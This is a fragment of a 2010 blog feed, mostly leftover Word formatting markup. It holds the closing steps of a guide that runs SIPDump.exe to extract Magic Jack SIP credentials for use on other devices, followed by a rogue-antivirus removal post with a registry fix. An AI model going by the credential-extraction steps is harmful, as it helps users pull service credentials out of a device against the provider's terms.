margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1657491084; 	mso-list-type:hybrid; 	mso-list-template-ids:582891460 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l0:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<p><strong> </strong></p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 953px; width: 1px; height: 1px;">
<p><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1974752171; 	mso-list-type:hybrid; 	mso-list-template-ids:-676023380 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l0:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l0:level3 	{mso-level-number-format:roman-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:right; 	text-indent:-9.0pt;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in;">1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Next start up your Magic Jack software, either unplug it and plug it back in or go the drive and select autorun.exe.</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in;">2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>When you see it starts to load and see the ad on the left hand side start to show click ok on the SIPDump.exe.</p>
</div>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F03%2Fhacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device%2F&amp;title=Hacking%20the%20Magic%20Jack%20in%202010%20for%20use%20on%20Trixbox%20or%20any%20other%20SIP%20device" id="wpa2a_82"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/feed/</wfw:commentRss>
		<slash:comments>79</slash:comments>
		</item>
		<item>
		<title>Vista Antivirus 2010 Quick removal</title>
		<link>http://www.digitaloffensive.com/2010/03/vista-antivirus-2010-quick-removal/</link>
		<comments>http://www.digitaloffensive.com/2010/03/vista-antivirus-2010-quick-removal/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 04:24:12 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=119</guid>
		<description><![CDATA[Vista Antivirus 2010 Quick removal Vista 2010 is a rogue anti-virus program that is usually advertised through the use of pop ups and fake security alerts that state that your computer is infected and that you should run an online anti-malware scan. Once the rogue program is installed, it will claim to scan your computer [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong><span style="text-decoration: underline;">Vista Antivirus 2010 Quick removal</span></strong></p>
<p>Vista 2010 is a rogue anti-virus program that is usually advertised through the use of pop ups and fake security alerts that state that your computer is infected and that you should run an online anti-malware scan. Once the rogue program is installed, it will claim to scan your computer for malware and display a list of false threats just to confirm that your computer is infected with malware (usually Trojans and computer worms). Then it will ask you to pay for a full version of the program in order to remove the threats which as we already know don&#8217;t even exist. Most importantly, don&#8217;t buy it. If you did, then please contact your credit card company and dispute the charges.</p>
<p>Though this piece of malicious code is extremely annoying it is also very easy to remove. I have put a kit together for quick download to remediate this issue. The kit includes a custom batch file called avkill that will loop looking for the process av.exe and kill it automatically. This will allow you to execute other tools to remove the virus. It also includes a registry fix to remove the changes it makes to the registry. The file is called fix.reg and contains the following information:</p>
<p>Windows Registry Editor Version 5.00</p>
<p>[-HKEY_CURRENT_USER\Software\Classes\.exe]</p>
<p>[-HKEY_CURRENT_USER\Software\Classes\secfile]</p>
<p>[-HKEY_CLASSES_ROOT\secfile]</p>
<p>[-HKEY_CLASSES_ROOT\.exe\shell\open\command]</p>
<p>[HKEY_CLASSES_ROOT\.exe]</p>
<p>@=&#8221;exefile&#8221;</p>
<p>&#8220;Content Type&#8221;=&#8221;application/x-msdownload&#8221;</p>
<p>To download the kit go to <a href="http://www.digitaloffensive.com/files/av2010.zip" target="_blank">http://www.digitaloffensive.com/files/av2010.zip</a></p>
